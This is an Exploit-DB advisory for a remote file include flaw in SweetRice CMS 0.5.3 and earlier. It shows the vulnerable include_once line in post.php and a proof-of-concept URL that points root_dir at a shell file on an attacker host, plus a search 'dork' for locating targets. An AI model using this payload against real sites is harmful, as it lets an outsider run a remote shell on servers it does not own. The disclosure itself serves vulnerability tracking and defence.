SweetRice <= 0.5.3 - Remote File Include Vulnerability

2009-11-29T00:00:00
ID EDB-ID:10246
Type exploitdb
Reporter cr4wl3r
Modified 2009-11-29T00:00:00

Description

SweetRice <= 0.5.3 Remote File Include Vulnerability. CVE-2009-4224,CVE-2009-4231. Webapps exploit for php platform

                                        
                                               [ Discovered by cr4wl3r \ cr4wl3r[4t]linuxmail[dot]org ]

########################################################################
#SweetRice &lt;= 0.5.0 Remote File Include Vulnerability
#Download Script      :  http://php.opensourcecms.com/scripts/redirect/download.php?id=353
#Dork                 :  die("lamers attempt");  :P
########################################################################
#
#Vuln : ./sweetrice/_plugin/subscriber/inc/post.php (line 2)
#       &lt;?php
#         include_once($root_dir."_plugin/fckeditor/fckeditor.php") ;
#       ?&gt;
#PoC  :  http://server/_plugin/subscriber/inc/post.php?root_dir=http://[attacker]/shell.txt???
#
#
#
########################################################################
########################################################################
####################[90r0nt4l0 und3r9r0nd c0mmun1ty]####################
########################################################################
########################################################################




   [ Gorontalo / 2009